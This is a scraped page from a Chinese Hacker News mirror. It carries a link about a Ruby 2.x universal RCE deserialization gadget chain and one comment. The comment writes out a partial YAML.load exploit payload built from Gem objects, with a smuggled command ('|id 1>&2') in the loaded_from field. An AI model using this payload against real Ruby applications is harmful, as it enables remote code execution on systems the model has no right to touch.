TE
科技回声
首页24小时热榜最新最佳问答展示工作
GitHubTwitter
首页

科技回声

基于 Next.js 构建的科技新闻平台,提供全球科技新闻和讨论内容。

GitHubTwitter

首页

首页最新最佳问答展示工作

资源链接

HackerNews API原版 HackerNewsNext.js

© 2025 科技回声. 版权所有。

Ruby 2.x Universal RCE Deserialization Gadget Chain (2018)

36 点作者 pentestercrab超过 5 年前

1 comment

pentestercrab超过 5 年前
The same gadget chain can alsobe used to exploit YAML.load [0] with the following:<p><pre><code> --- !ruby&#x2F;object:Gem::Requirement requirements: !ruby&#x2F;object:Gem::DependencyList specs: - !ruby&#x2F;object:Gem::Source::SpecificFile spec: &amp;1 !ruby&#x2F;object:Gem::StubSpecification loaded_from: &quot;|id 1&gt;&amp;2&quot; - !ruby&#x2F;object:Gem::Source::SpecificFile spec: </code></pre> [0] <a href="https:&#x2F;&#x2F;staaldraad.github.io&#x2F;post&#x2F;2019-03-02-universal-rce-ruby-yaml-load&#x2F;" rel="nofollow">https:&#x2F;&#x2F;staaldraad.github.io&#x2F;post&#x2F;2019-03-02-universal-rce-r...</a>